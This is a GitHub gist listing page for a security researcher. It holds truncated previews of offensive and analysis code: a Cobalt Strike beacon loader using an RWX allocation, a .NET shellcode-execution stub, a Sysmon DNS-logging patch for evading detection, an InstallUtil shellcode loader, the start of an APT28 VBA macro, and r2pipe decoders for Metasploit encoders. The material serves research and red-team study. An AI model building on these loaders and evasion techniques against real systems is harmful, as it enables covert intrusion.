This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <libusb-1.0/libusb.h> | |
| void printdev(libusb_device *dev) { | |
| struct libusb_device_descriptor desc; | |
| struct libusb_config_descriptor *config; | |
| struct libusb_interface_descriptor *interdesc; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| typedef unsigned int DWORD; | |
| typedef unsigned char BYTE; | |
| typedef unsigned char * PBYTE; | |
| typedef DWORD HRESULT; | |
| typedef unsigned short USHORT; | |
| typedef unsigned int ULONG; | |
| typedef unsigned char UCHAR; | |
| typedef bool BOOL; | |
| static const DWORD kCurrentMajorVersion = 2; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import * | |
| from scapy.utils import rdpcap | |
| import sys | |
| import struct | |
| from pwn import * | |
| MESSAGE_TYPE_SYN = 0x00 | |
| MESSAGE_TYPE_MSG = 0x1 | |
| MESSAGE_TYPE_PING = 0xFF |
xpn
/ meterpreter_decode_xor.py
Created
December 7, 2016 16:54
Radare2 r2pipe script to decode Meterpreters Single Byte XOR Countdown Encoder
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Radare2 r2pipe script to decode Meterpreters Single Byte XOR Countdown Encoder | |
| # https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/countdown.rb | |
| import r2pipe | |
| import sys | |
| def dump(addr): | |
| pass | |
| def startEsil(): |
xpn
/ external_client_filetransfer.cpp
Created
March 28, 2018 22:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| // Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread | |
| void spawnBeacon(char *payload, DWORD len) { | |
| HANDLE threadHandle; | |
| DWORD threadId = 0; | |
| char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
| memcpy(alloc, payload, len); |
xpn
/ alpha_mixed.py
Created
December 8, 2016 00:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # r2pipe script using ESIL to decode the msfvenom x86/alpha_mixed encoder | |
| import r2pipe | |
| import sys | |
| def dump(addr): | |
| pass | |
| def startEsil(): | |
| r.cmd('e io.cache=true') |
xpn
/ ExecStubOverwriteWithoutPInvoke.cs
Created
May 3, 2021 22:58
https://blog.xpnsec.com/weird-ways-to-execute-dotnet/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Reflection; | |
| using System.Runtime.InteropServices; | |
| namespace NautilusProject | |
| { | |
| public class ExecStubOverwriteWithoutPInvoke | |
| { | |
| public static void Execute(byte[] shellcode) | |
| { |
xpn
/ dns_sysmon_patch.c
Last active
May 4, 2022 15:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <iostream> | |
| #include <Windows.h> | |
| #include <WinDNS.h> | |
| // Pattern for hunting dnsapi!McTemplateU0zqxqz | |
| #define PATTERN (unsigned char*)"\x48\x89\x5c\x24\x08\x44\x89\x4c\x24\x20\x55\x48\x8d\x6c" | |
| #define PATTERN_LEN 14 | |
| // Search for pattern in memory | |
| DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) { |
xpn
/ InstallUtil-Shellcode-cs
Created
May 11, 2018 01:15
— forked from lithackr/InstallUtil-Shellcode-cs
From https://gist.github.com/subTee/408d980d88515a539672
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
xpn
/ APT28 Hospitality docm VBA
Created
August 12, 2017 11:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Attribute VB_Name = "ThisDocument" | |
| Attribute VB_Base = "1Normal.ThisDocument" | |
| Attribute VB_GlobalNameSpace = False | |
| Attribute VB_Creatable = False | |
| Attribute VB_PredeclaredId = True | |
| Attribute VB_Exposed = True | |
| Attribute VB_TemplateDerived = True | |
| Attribute VB_Customizable = True | |
| Sub AutoOpen() | |
| Execute |